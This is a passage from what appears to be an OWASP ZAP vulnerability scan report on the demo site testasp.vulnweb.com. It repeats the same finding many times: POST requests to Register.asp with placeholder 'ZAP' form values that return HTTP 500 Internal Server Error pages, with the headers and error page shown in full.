Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
